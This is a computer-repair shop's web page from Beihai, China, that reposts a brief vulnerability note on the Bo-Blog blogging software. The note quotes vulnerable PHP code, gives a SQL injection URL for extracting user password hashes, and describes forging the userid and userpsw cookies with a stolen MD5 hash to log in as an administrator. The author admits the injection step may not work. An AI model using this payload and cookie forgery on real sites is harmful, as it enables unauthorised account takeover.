Logo北海电脑维修-北海专业电脑维修

北海电脑维修电话-北海专业电脑维修

电脑维修服务热线-北海电脑维修

北海电脑快速维修(北海电脑维修)

联系我们

手    机:15907897527

Q      Q:83453780

邮    箱:530001

地    址:北海市上海路海宁新区

联系我们-北海电脑快速维修(北海电脑维修)

常用查询
电脑知识 电脑技术
网络技术 电脑防毒
操作系统
电脑维修技术文章-boblog注入后COOKIE欺骗漏洞1
Article 电脑技术文章

boblog注入后COOKIE欺骗漏洞

    影响版本:boblog最新
    官方网站:http://www.bo-blog.com//
    漏洞类型:COOKIE欺骗
    漏洞描述:
    代码
    index.php代码
    if ($go) @list($job, $itemid)=@explode('_', basename($go));
    原本注入语句为 index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23
    也就是 经过explode处理后 假如数据库为boblog_user 最终只会成为 boblog
    更何况 存在注入漏洞的
    `category` in ({$all_needed_cates})");
    不会因为#符号而注析掉后面的东西 只会变成from boblog_user#) PS:可能因为这里我不会绕过
    COOKIES欺骗漏洞很简单
    假如某牛真的注入成功得到MD5密码不用去跑MD5了
    直接
    setcookie ('userid', '1',);
    setcookie ('userpsw', 'md5密文', );
    既可了……

关键词:boblog注入后COOKIE欺骗漏洞